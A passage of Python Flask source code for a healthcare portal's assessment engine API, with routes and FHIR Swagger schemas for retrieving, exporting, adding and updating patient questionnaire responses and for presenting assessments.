        patient_id, 'view', allow_on_url_authenticated_encounters=True)
    qnr = QuestionnaireResponse.query.get(qnr_id)
    if not qnr:
        abort(404)
    # The QNR must belong to the patient named in the URL
    if qnr.subject_id != patient.id:
        abort(
            400,
            "Requested patient doesn't own requested questionnaire_response")
    # NB, document_answered returns a (potentially) modified *copy* of
    # the document, so changes aren't persisted or found in db session
    # cached objects. see TN-2417 for example side-effects
    document = qnr.document_answered
    for question in document['group']['question']:
        for answer in question['answer']:
            # Hack: Extensions should be a list, correct in-place if need be
            # todo: migrate towards FHIR spec in persisted data
            if (
                'extension' in answer.get('valueCoding', {}) and
                not isinstance(answer['valueCoding']['extension'], (tuple, list))
            ):
                answer['valueCoding']['extension'] = [answer['valueCoding']['extension']]
    # Hack: add missing "resource" wrapper for DSTU2 compliance
    # Remove when all interventions compliant
    if request.args.get('patch_dstu2'):
        document = {
            'resource': document,
            'fullUrl': request.url,
        }
    # No place within the FHIR spec to associate 'visit name' nor a
    # 'status' as per business rules (i.e. 'in-progress' becomes
    # 'partially completed' once the associated QB expires).
    # Use FHIR `extension`s to pass these fields to clients.
    extensions = qnr.extensions()
    if extensions:
        assert('extension' not in qnr.document) # catch future collisions
        document['extension'] = extensions
    return jsonify(document)
@assessment_engine_api.route('/api/patient/assessment')
@crossdomain()
@roles_required(
    [ROLE.STAFF_ADMIN.value, ROLE.STAFF.value, ROLE.RESEARCHER.value])
@oauth.require_oauth()
def get_assessments():
    """
    Return multiple patients' responses to all questionnaires
    NB list of patients returned is limited by current_user's implicit
    permissions, typically controlled through organization affiliation.
    ---
    operationId: getQuestionnaireResponses
    tags:
      - Assessment Engine
    parameters:
      - name: format
        in: query
        description: format of file to download (CSV or JSON)
        required: false
        type: string
        enum:
          - json
          - csv
        default: json
      - name: patch_dstu2
        in: query
        description: whether or not to make bundles DSTU2 compliant
        required: false
        type: boolean
        default: false
      - name: instrument_id
        in: query
        description:
          ID of the instrument, eg "epic26", "eq5d"
        required: false
        type: array
        items:
          type: string
          enum:
            - epic26
            - eq5d
        collectionFormat: multi
    produces:
      - application/json
    responses:
      200:
        description: successful operation
        schema:
          id: assessments_bundle
          required:
            - type
          properties:
            type:
              description:
                Indicates the purpose of this bundle- how it was
                intended to be used.
              type: string
              enum:
                - document
                - message
                - transaction
                - transaction-response
                - batch
                - batch-response
                - history
                - searchset
                - collection
            link:
              description:
                A series of links that provide context to this bundle.
              items:
                properties:
                  relation:
                    description:
                      A name which details the functional use for
                      this link - see [[http://www.iana.org/assignments/link-relations/link-relations.xhtml]].
                  url:
                    description: The reference details for the link.
            total:
              description:
                If a set of search matches, this is the total number of
                matches for the search (as opposed to the number of
                results in this bundle).
              type: integer
            entry:
              type: array
              items:
                $ref: "#/definitions/FHIRPatient"
      401:
        description:
          if missing valid OAuth token or logged-in user lacks permission
          to view requested patient
    security:
      - ServiceToken: []
      - OAuth2AuthzFlow: []
    """
    # Local import — presumably deferred to avoid a circular import at
    # module load time; confirm before hoisting to the top of the file.
    from ..tasks import research_report_task
    research_studies = set()
    questionnaire_list = request.args.getlist('instrument_id')
    for q in questionnaire_list:
        research_studies.add(research_study_id_from_questionnaire(q))
    # Every requested instrument must map to the same research study
    if len(research_studies) != 1:
        abort(
            400,
            f"Requested instruments ({questionnaire_list}) span multiple "
            "research studies")
    research_study_id = research_studies.pop()
    if research_study_id is None:
        # Fall back to the base study when instruments don't name one
        research_study_id = 0
    # This frequently takes over a minute to produce. Generate a serializable
    # form of all args for reliable hand off to a background task.
    kwargs = {
        'instrument_ids': questionnaire_list,
        'research_study_id': research_study_id,
        'acting_user_id': current_user().id,
        'patch_dstu2': request.args.get('patch_dstu2'),
        'request_url': request.url,
        'lock_key': "research_report_task_lock",
        'response_format': request.args.get('format', 'json').lower()
    }
    try:
        # Hand the task off to the job queue, and return 202 with URL for
        # checking the status of the task
        task = guarded_task_launch(research_report_task, **kwargs)
        return jsonify({}), 202, {'Location': url_for(
            'portal.task_status', task_id=task.id, _external=True)}
    except LockTimeout:
        # NOTE(review): 503 Service Unavailable may be semantically more apt
        # than 502 here; left as-is since clients may depend on the code.
        msg = (
            "The system is busy exporting a report for another user. "
            "Please try again in a few minutes.")
        response = make_response(msg, 502)
        response.mimetype = "text/plain"
        return response
@assessment_engine_api.route(
    '/api/patient/<int:patient_id>/assessment',
    methods=('PUT',),
)
@crossdomain()
@oauth.require_oauth()
def assessment_update(patient_id):
    """Update an existing questionnaire response on a patient's record
    Submit a minimal FHIR doc in JSON format including the 'QuestionnaireResponse'
    resource type.
    ---
    operationId: updateQuestionnaireResponse
    tags:
      - Assessment Engine
    produces:
      - application/json
    parameters:
      - name: patient_id
        in: path
        description: TrueNTH patient ID
        required: true
        type: integer
        format: int64
      - in: body
        name: body
        schema:
          $ref: "#/definitions/QuestionnaireResponse"
    responses:
      401:
        description:
          if missing valid OAuth token or logged-in user lacks permission
          to view requested patient
      404:
        description: existing QuestionnaireResponse not found
    security:
      - ServiceToken: []
    """
    if not hasattr(request, 'json') or not request.json:
        return jsonify(message='Invalid request - requires JSON'), 400
    if request.json.get('resourceType') != 'QuestionnaireResponse':
        return jsonify(
            message='Requires resourceType of "QuestionnaireResponse"'), 400
    # Verify the current user has permission to edit given patient
    patient = get_user(
        patient_id, 'edit', allow_on_url_authenticated_encounters=True)
    # Standard payload returned (with tweaks) from every exit path below
    response = {
        'ok': False,
        'message': 'error updating questionnaire response',
        'valid': False,
    }
    updated_qnr = request.json
    try:
        # Schema validation, plus sanity check that 'authored' isn't future
        QuestionnaireResponse.validate_document(updated_qnr)
        QuestionnaireResponse.validate_authored(
            FHIR_datetime.parse(updated_qnr.get('authored')))
    except (jsonschema.ValidationError, NoFutureDates) as e:
        return jsonify({
            'ok': False,
            'message': str(e),
            'reference': getattr(e, 'schema', ''),
        }), 400
    else:
        response.update({
            'ok': True,
            'message': 'questionnaire response valid',
            'valid': True,
        })
    # The identifier locates the previously-submitted QNR to replace
    try:
        identifier = Identifier.from_fhir(updated_qnr.get('identifier'))
    except ValueError as e:
        response['message'] = str(e)
        return jsonify(response), 400
    existing_qnr = QuestionnaireResponse.by_identifier(identifier)
    if existing_qnr.count() == 0:
        current_app.logger.warning(
            "attempted update on QuestionnaireResponse with unknown "
            "identifier {}".format(identifier))
        response['message'] = "existing QuestionnaireResponse not found"
        return jsonify(response), 404
    if existing_qnr.count() > 1:
        msg = ("can't update; multiple QuestionnaireResponses found with "
               "identifier {}".format(identifier))
        current_app.logger.warning(msg)
        response['message'] = msg
        # Fixed: previously serialized only the bare message string here;
        # return the standard response payload for consistency with the
        # other error paths.
        return jsonify(response), 409
    response.update({'message': 'previous questionnaire response found'})
    existing_qnr = existing_qnr.first()
    existing_qnr.status = updated_qnr["status"]
    existing_qnr.document = updated_qnr
    db.session.add(existing_qnr)
    db.session.commit()
    existing_qnr.assign_qb_relationship(acting_user_id=current_user().id)
    # TODO: only extract QuestionnaireResponses where the corresponding Questionnaire has the SDC extension
    qn_name = existing_qnr.document.get("questionnaire").get("reference", '').split('/')[-1]
    if qn_name == 'ironman_ss' and existing_qnr.status == 'completed':
        from ..tasks import extract_observations_task
        extract_observations_task.apply_async(
            kwargs={'questionnaire_response_id': existing_qnr.id}
        )
    auditable_event(
        "updated {}".format(existing_qnr),
        user_id=current_user().id,
        subject_id=patient.id,
        context='assessment',
    )
    response.update({'message': 'questionnaire response updated successfully'})
    # The patient's questionnaire-bank timeline is now stale; force rebuild
    invalidate_users_QBT(patient.id, research_study_id='all')
    return jsonify(response)
@assessment_engine_api.route(
    '/api/patient/<int:patient_id>/assessment', methods=('POST',))
@crossdomain()
@oauth.require_oauth()
def assessment_add(patient_id):
    """Add a questionnaire response to a patient's record

    Submit a minimal FHIR doc in JSON format including the
    'QuestionnaireResponse' resource type.

    NB, updates are only possible on QuestionnaireResponses for which a
    well defined ``identifer`` is included.  If included, this value must
    be distinct over (``system``, ``value``).  A duplicate submission will
    result in a ``409: conflict`` response, and refusal to retain the
    submission.
    ---
    operationId: addQuestionnaireResponse
    tags:
      - Assessment Engine
    definitions:
      - schema:
          id: Question
          description: An individual question and related attributes
          type: object
          externalDocs:
            url: http://hl7.org/implement/standards/fhir/DSTU2/questionnaireresponse-definitions.html#QuestionnaireResponse.group.question
          additionalProperties: false
          properties:
            text:
              description: Question text
              type: string
            linkId:
              description: Corresponding question within Questionnaire
              type: string
            answer:
              description:
                The respondent's answer(s) to the question
              externalDocs:
                url: http://hl7.org/implement/standards/fhir/DSTU2/questionnaireresponse-definitions.html#QuestionnaireResponse.group.question.answer
              type: array
              items:
                $ref: "#/definitions/Answer"
      - schema:
          id: Answer
          description:
            An individual answer to a question and related attributes.
            May only contain a single value[x] attribute
          type: object
          externalDocs:
            url: http://hl7.org/implement/standards/fhir/DSTU2/questionnaireresponse-definitions.html#QuestionnaireResponse.group.question.answer.value_x_
          additionalProperties: false
          properties:
            valueBoolean:
              description: Boolean value answer to a question
              type: boolean
            valueDecimal:
              description: Decimal value answer to a question
              type: number
            valueInteger:
              description: Integer value answer to a question
              type: integer
            valueDate:
              description: Date value answer to a question
              type: string
              format: date
            valueDateTime:
              description: Datetime value answer to a question
              type: string
              format: date-time
            valueInstant:
              description: Instant value answer to a question
              type: string
              format: date-time
            valueTime:
              description: Time value answer to a question
              type: string
            valueString:
              description: String value answer to a question
              type: string
            valueUri:
              description: URI value answer to a question
              type: string
            valueAttachment:
              description: Attachment value answer to a question
              $ref: "#/definitions/ValueAttachment"
            valueCoding:
              description:
                Coding value answer to a question, may include score as
                FHIR extension
              $ref: "#/definitions/ValueCoding"
            valueQuantity:
              description: Quantity value answer to a question
              $ref: "#/definitions/Quantity"
            valueReference:
              description: Reference value answer to a question
              $ref: "#/definitions/Reference"
            group:
              description: Nested questionnaire group
              $ref: "#/definitions/Group"
      - schema:
          id: Group
          description:
            A structured set of questions and their answers. The
            questions are ordered and grouped into coherent subsets,
            corresponding to the structure of the grouping of the
            questionnaire being responded to.
          type: object
          additionalProperties: false
          properties:
            linkId:
              description:
                The item from the Questionnaire that corresponds to this item
                in the QuestionnaireResponse resource.
              type: string
            title:
              description: Name for this group
              type: string
            text:
              description:
                Text that is displayed above the contents of the group or as
                the text of the question being answered.
              type: string
            question:
              description: Questions in this group.
              items:
                $ref: "#/definitions/Question"
              type: array
            group:
              description:
                Questions or sub-groups nested beneath a question or group.
              items:
                $ref: "#/definitions/Group"
              type: array
      - schema:
          id: Quantity
          description:
            A measured amount (or an amount that can potentially be measured).
            Note that measured amounts include amounts that are not precisely
            quantified, including amounts involving arbitrary units and
            floating currencies.
          type: object
          additionalProperties: false
          properties:
            id:
              description:
                Unique id for the element within a resource (for internal
                references). This may be any string value that does not
                contain spaces.
              type: string
            value:
              description:
                The value of the measured amount. The value includes an
                implicit precision in the presentation of the value.
              type: number
            comparator:
              description:
                How the value should be understood and represented - whether
                the actual value is greater or less than the stated value due
                to measurement issues; e.g. if the comparator is \"\u003c\" ,
                then the real value is \u003c stated value.
              type: string
              enum:
                - "\u003c"
                - "\u003c\u003d"
                - "\u003e\u003d"
                - "\u003e"
            unit:
              description: A human-readable form of the unit.
              type: string
            system:
              description:
                The identification of the system that provides the coded form
                of the unit.
              type: string
            code:
              description:
                A computer processable form of the unit in some unit
                representation system.
              type: string
      - schema:
          id: Questionnaire
          type: object
          additionalProperties: false
          properties:
            display:
              description: Name of Questionnaire
              type: string
            reference:
              description: URI uniquely defining the Questionnaire
              type: string
      - schema:
          id: QuestionnaireResponse
          type: object
          required:
            - resourceType
            - status
          additionalProperties: false
          properties:
            identifier:
              description:
                A business identifier assigned to a particular completed
                (or partially completed) questionnaire.
              $ref: "#/definitions/Identifier"
            questionnaire:
              description:
                The Questionnaire that defines and organizes the questions
                for which answers are being provided.
              $ref: "#/definitions/Questionnaire"
            resourceType:
              description:
                defines FHIR resource type, must be QuestionnaireResponse
              type: string
            status:
              externalDocs:
                url: http://hl7.org/implement/standards/fhir/DSTU2/questionnaireresponse-definitions.html#QuestionnaireResponse.status
              description:
                The lifecycle status of the questionnaire response as a
                whole.  If submitting a QuestionnaireResponse with status
                "in-progress", the ``identifier`` must also be well
                defined.  Without it, there's no way to reference it
                for updates.
              type: string
              enum:
                - in-progress
                - completed
            subject:
              description:
                The subject of the questionnaire response.  This could be
                a patient, organization, practitioner, device, etc.  This
                is who/what the answers apply to, but is not necessarily
                the source of information.
              $ref: "#/definitions/Reference"
            author:
              description:
                Person who received the answers to the questions in the
                QuestionnaireResponse and recorded them in the system.
              $ref: "#/definitions/Reference"
            authored:
              externalDocs:
                url: http://hl7.org/implement/standards/fhir/DSTU2/questionnaireresponse-definitions.html#QuestionnaireResponse.authored
              description: The datetime this resource was last updated
              type: string
              format: date-time
            source:
              $ref: "#/definitions/Reference"
            group:
              description:
                A group or question item from the original questionnaire for
                which answers are provided.
              type: object
              $ref: "#/definitions/Group"
          example:
            resourceType: QuestionnaireResponse
            authored: '2016-03-11T23:47:28Z'
            status: completed
            identifier:
              value: '119.0'
              use: official
              label: cPRO survey session ID
              system: 'https://ae.us.truenth.org/eproms'
            subject:
              display: patient demographics
              reference: https://stg.us.truenth.org/api/demographics/10015
            author:
              display: patient demographics
              reference: https://stg.us.truenth.org/api/demographics/10015
            source:
              display: patient demographics
              reference: https://stg.us.truenth.org/api/demographics/10015
            group:
              question:
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.1.1
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 1
                linkId: epic26.1
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.2.1
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 1
                linkId: epic26.2
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.3.3
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 2
                linkId: epic26.3
              - answer: []
                linkId: epic26.4
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.5.4
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 3
                linkId: epic26.5
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.6.3
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 2
                linkId: epic26.6
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.7.2
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 1
                linkId: epic26.7
              - answer: []
                linkId: epic26.8
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.9.3
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 3
                linkId: epic26.9
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.10.5
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 4
                linkId: epic26.10
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.11.2
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 1
                linkId: epic26.11
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.12.2
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 1
                linkId: epic26.12
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.13.4
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 3
                linkId: epic26.13
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.14.1
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 0
                linkId: epic26.14
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.15.5
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 5
                linkId: epic26.15
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.16.2
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 2
                linkId: epic26.16
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.17.1
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 1
                linkId: epic26.17
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.18.4
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 4
                linkId: epic26.18
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.19.4
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 4
                linkId: epic26.19
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.20.2
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 2
                linkId: epic26.20
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.21.5
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 5
                linkId: epic26.21
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.22.1
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 0
                linkId: epic26.22
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.23.2
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 1
                linkId: epic26.23
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.24.3
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 2
                linkId: epic26.24
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.25.4
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 3
                linkId: epic26.25
              - answer:
                - valueCoding:
                    system: https://stg.us.truenth.org/api/codings/assessment
                    code: epic26.26.5
                    extension:
                      url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
                      valueDecimal: 4
                linkId: epic26.26
            questionnaire:
              display: EPIC 26 Short Form
              reference: https://stg.us.truenth.org/api/questionnaires/epic26
      - schema:
          id: Reference
          description: link to an internal or external resource
          type: object
          additionalProperties: false
          properties:
            reference:
              description: Relative, internal or absolute URL reference
              type: string
            display:
              description: Text alternative for the resource
              type: string
      - schema:
          id: ValueAttachment
          description: For referring to data content defined in other formats
          type: object
          additionalProperties: false
          properties:
            contentType:
              description:
                Identifies the type of the data in the attachment and allows
                a method to be chosen to interpret or render the data.
                Includes mime type parameters such as charset where
                appropriate.
              type: string
            language:
              description:
                The human language of the content. The value can be any valid
                value according to BCP 47.
              type: string
            data:
              description:
                The actual data of the attachment - a sequence of bytes,
                base64 encoded.
              type: string
              format: byte
            url:
              description: A location where the data can be accessed.
              type: string
            size:
              description:
                The number of bytes of data that make up this attachment
                (before base64 encoding, if that is done).
              type: integer
            hash:
              description:
                The calculated hash of the data using SHA-1.
                Represented using base64.
              type: string
              format: byte
            title:
              description:
                A label or set of text to display in place of the data.
              type: string
            creation:
              description: The date that the attachment was first created.
              type: string
              format: date-time
      - schema:
          id: ValueCoding
          type: object
          additionalProperties: false
          properties:
            system:
              description: Identity of the terminology system
              type: string
              format: uri
            version:
              description: Version of the system - if relevant
              type: string
            code:
              description: Symbol in syntax defined by the system
              type: string
            display:
              description: Representation defined by the system
              type: string
            userSelected:
              description: If this coding was chosen directly by the user
              type: boolean
            extension:
              description:
                Extension - Numerical value associated with the code
              $ref: "#/definitions/ValueDecimalExtension"
      - schema:
          id: ValueDecimalExtension
          type: object
          additionalProperties: false
          properties:
            url:
              description: Hardcoded reference to extension
              type: string
              format: uri
            valueDecimal:
              description: Numeric score value
              type: number
    produces:
      - application/json
    parameters:
      - name: patient_id
        in: path
        description: TrueNTH patient ID
        required: true
        type: integer
        format: int64
      - name: entry_method
        in: query
        description: Entry method such as `paper` if known
        required: false
        type: string
      - in: body
        name: body
        schema:
          $ref: "#/definitions/QuestionnaireResponse"
    responses:
      401:
        description:
          if missing valid OAuth token or logged-in user lacks permission
          to view requested patient
    security:
      - ServiceToken: []

    """
    # Reject anything that isn't a JSON QuestionnaireResponse before
    # touching the database
    if not hasattr(request, 'json') or not request.json:
        return jsonify(message='Invalid request - requires JSON'), 400
    if request.json.get('resourceType') != 'QuestionnaireResponse':
        return jsonify(
            message='Requires resourceType of "QuestionnaireResponse"'), 400
    # Verify the current user has permission to edit given patient
    patient = get_user(
        patient_id, 'edit', allow_on_url_authenticated_encounters=True)
    # Default (pessimistic) response body; mutated as validation proceeds
    response = {
        'ok': False,
        'message': 'error saving questionnaire response',
        'valid': False,
    }
    try:
        # Schema validation plus a guard against future-dated `authored`
        QuestionnaireResponse.validate_document(request.json)
        QuestionnaireResponse.validate_authored(
            FHIR_datetime.parse(request.json.get('authored')))
    except (jsonschema.ValidationError, NoFutureDates) as e:
        response = {
            'ok': False,
            'message': str(e),
            'reference': getattr(e, 'schema', ''),
        }
        return jsonify(response), 400
    identifier = None
    if 'identifier' in request.json:
        # Confirm it's unique, or raise 409
        try:
            identifier = Identifier.from_fhir(request.json['identifier'])
        except ValueError as e:
            response['message'] = str(e)
            return jsonify(response), 400
        existing_qnr = QuestionnaireResponse.by_identifier(identifier)
        if existing_qnr.count():
            msg = ("QuestionnaireResponse with matching {} already exists; "
                   "must be unique over (system, value)".format(identifier))
            current_app.logger.warning(msg)
            response['message'] = msg
            return jsonify(response), 409
    # An in-progress QNR must carry an identifier, as that's the only
    # handle available for the subsequent update call
    if request.json.get('status') == 'in-progress' and not identifier:
        msg = "Status {} received without the required identifier".format(
            request.json.get('status'))
        current_app.logger.warning(msg)
        response['message'] = msg
        return jsonify(response), 400
    response.update({
        'ok': True,
        'message': 'questionnaire response valid',
        'valid': True,
    })
    encounter = current_user().current_encounter()
    if QuestionnaireResponse.query.filter(
            QuestionnaireResponse.encounter_id == encounter.id).count():
        # Another QuestionnaireResponse already attached to this encounter,
        # force a refresh to maintain a discrete QNR <=> Encounter pair.
        encounter = current_user().current_encounter(force_refresh=True)
    if 'entry_method' in request.args:
        # Record entry method (e.g. `paper`) as an encounter type coding
        encounter_type = getattr(
            EC, request.args['entry_method'].upper()).codings[0]
        encounter.type.append(encounter_type)
    questionnaire_response = QuestionnaireResponse(
        subject_id=patient_id,
        status=request.json["status"],
        document=request.json,
        encounter=encounter,
    )
    db.session.add(questionnaire_response)
    db.session.commit()
    # Associate the new QNR with its questionnaire bank after commit
    questionnaire_response.assign_qb_relationship(
        acting_user_id=current_user().id)
    # TODO: only extract QuestionnaireResponses where the corresponding Questionnaire has the SDC extension
    qn_name = questionnaire_response.document.get("questionnaire").get("reference", '').split('/')[-1]
    if qn_name == 'ironman_ss' and questionnaire_response.status == 'completed':
        from ..tasks import extract_observations_task
        extract_observations_task.apply_async(
            kwargs={'questionnaire_response_id': questionnaire_response.id}
        )
    auditable_event("added {}".format(questionnaire_response),
                    user_id=current_user().id, subject_id=patient_id,
                    context='assessment')
    response.update({'message': 'questionnaire response saved successfully'})
    # New QNR invalidates the cached questionnaire bank timeline
    invalidate_users_QBT(patient.id, research_study_id='all')
    return jsonify(response)
@assessment_engine_api.route('/api/invalidate/<int:user_id>')
@oauth.require_oauth()
def invalidate(user_id):
    """Drop the named user's cached questionnaire bank timeline

    Requires 'edit' permission on the named user (enforced by get_user).
    Returns the user's FHIR representation once the cache is invalidated.
    """
    subject = get_user(user_id, 'edit')
    invalidate_users_QBT(user_id, research_study_id='all')
    return jsonify(invalidated=subject.as_fhir())
@assessment_engine_api.route('/api/present-needed')
@roles_required([ROLE.STAFF_ADMIN.value, ROLE.STAFF.value, ROLE.PATIENT.value])
@oauth.require_oauth()
def present_needed():
    """Look up needed and in process q's for user and then present_assessment

    Takes the same attributes as present_assessment.

    If `authored` date is different from utcnow(), any instruments found to be
    in an `in_progress` state will be treated as if they haven't been started.

    Manages a single research study at a time.  For all research studies a
    user is enrolled in, present-needed on the first found with outstanding
    work.  Call again after completion to pick up the next study.
    """
    from ..models.qb_status import QB_Status  # avoid cycle
    subject_id = request.args.get('subject_id') or current_user().id
    # get_user enforces the current user's 'edit' permission on subject
    subject = get_user(
        subject_id, 'edit', allow_on_url_authenticated_encounters=True)
    as_of_date = FHIR_datetime.parse(
        request.args.get('authored'), none_safe=True)
    if not as_of_date:
        as_of_date = datetime.utcnow()
    # BUGFIX: initialize before the loop.  `args` was previously bound only
    # inside the loop body, raising NameError below for a subject with no
    # assigned research studies; an empty dict now falls through to the
    # "all complete" branch.
    args = {}
    for rs in ResearchStudy.assigned_to(subject):
        assessment_status = QB_Status(
            subject, research_study_id=rs, as_of_date=as_of_date)
        if assessment_status.overall_status == 'Withdrawn':
            abort(400, 'Withdrawn; no pending work found')
        args = dict(request.args.items())
        args['instrument_id'] = (
            assessment_status.instruments_needing_full_assessment(
                classification='all'))
        # Instruments in progress need special handling.  Assemble
        # the list of external document ids for reliable resume
        # behavior at external assessment intervention.
        resume_ids = assessment_status.instruments_in_progress(
            classification='all')
        if resume_ids:
            args['resume_identifier'] = resume_ids
        if args.get('instrument_id') or args.get('resume_identifier'):
            # work to be done in this study, break out of loop
            break
    if not args.get('instrument_id') and not args.get('resume_identifier'):
        flash(_('All available questionnaires have been completed'))
        current_app.logger.debug('no assessments needed, redirecting to /')
        return redirect('/')
    url = url_for('.present_assessment', **args)
    # url_authenticated (weakly authenticated) users must confirm identity
    # before being handed an assessment session
    if current_user().current_encounter().auth_method == "url_authenticated":
        current_app.logger.debug('redirect to confirm identity')
        return redirect('/confirm-identity?redirect_url={}'.format(quote(url)))
    current_app.logger.debug('present assessment url, redirecting to: %s', url)
    return redirect(url, code=302)
@assessment_engine_api.route('/api/present-assessment')
@crossdomain()
@roles_required([ROLE.STAFF_ADMIN.value, ROLE.STAFF.value, ROLE.PATIENT.value])
@oauth.require_oauth()
def present_assessment(instruments=None):
    """Request that TrueNTH present an assessment via the assessment engine

    Redirects to the first assessment engine instance that is capable of
    administering the requested assessment
    ---
    operationId: present_assessment
    tags:
      - Assessment Engine
    produces:
      - text/html
    parameters:
      - name: instrument_id
        in: query
        description:
          ID of the instrument, eg "epic26", "eq5d"
        required: true
        type: array
        items:
          type: string
          enum:
            - epic26
            - eq5d
        collectionFormat: multi
      - name: resume_instrument_id
        in: query
        description:
          ID of the instrument, eg "epic26", "eq5d"
        required: true
        type: array
        items:
          type: string
          enum:
            - epic26
            - eq5d
        collectionFormat: multi
      - name: next
        in: query
        description: Intervention URL to return to after assessment completion
        required: true
        type: string
        format: url
      - name: subject_id
        in: query
        description: User ID to Collect QuestionnaireResponses as
        required: false
        type: integer
      - name: authored
        in: query
        description: Override QuestionnaireResponse.authored with given datetime
        required: false
        type: string
        format: date-time
    responses:
      303:
        description: successful operation
        headers:
          Location:
            description:
              URL registered with assessment engine used to provide given
              assessment
            type: string
            format: url
      401:
        description: if missing valid OAuth token or bad `next` parameter
    security:
      - ServiceToken: []
      - OAuth2AuthzFlow: []

    """
    queued_instruments = request.args.getlist('instrument_id')
    resume_instruments = request.args.getlist('resume_instrument_id')
    resume_identifiers = request.args.getlist('resume_identifier')
    # Hack to allow deprecated API to piggyback
    # Remove when deprecated_present_assessment() is fully removed
    if instruments is not None:
        queued_instruments = instruments
    # Combine requested instruments into single list, dropping duplicates
    # while maintaining first-seen order.  dict.fromkeys preserves insertion
    # order (guaranteed for dict since Python 3.7) and replaces the previous
    # O(n^2) sorted(set(...), key=list.index) construction.
    common_instruments = list(
        dict.fromkeys(resume_instruments + queued_instruments))
    configured_instruments = Questionnaire.questionnaire_codes()
    if set(common_instruments) - set(configured_instruments):
        abort(
            404,
            "No matching assessment found: %s" % (
                ", ".join(set(common_instruments) - set(configured_instruments))
            )
        )
    assessment_params = {
        "project": ",".join(common_instruments),
        "resume_instrument_id": ",".join(resume_instruments),
        "resume_identifier": ",".join(resume_identifiers),
        "subject_id": request.args.get('subject_id'),
        "authored": request.args.get('authored'),
        "entry_method": request.args.get('entry_method'),
    }
    # Clear empty querystring params
    assessment_params = {k: v for k, v in assessment_params.items() if v}
    assessment_url = "".join((
        INTERVENTION.ASSESSMENT_ENGINE.link_url,
        "/surveys/new_session?",
        requests.compat.urlencode(assessment_params),
    ))
    if 'next' in request.args:
        next_url = request.args.get('next')
        # Validate next URL the same way CORS requests are
        validate_origin(next_url)
        current_app.logger.debug('storing session[assessment_return]: %s',
                                 next_url)
        session['assessment_return'] = next_url
    return redirect(assessment_url, code=303)
@assessment_engine_api.route('/api/present-assessment/<instrument_id>')
@oauth.require_oauth()
def deprecated_present_assessment(instrument_id):
    """Deprecated single-instrument form of present_assessment

    Logs the caller (so remaining users of the old URL form can be found
    and migrated), then delegates to present_assessment.
    """
    # fix typo in the warning text: "depricated" -> "deprecated"
    current_app.logger.warning(
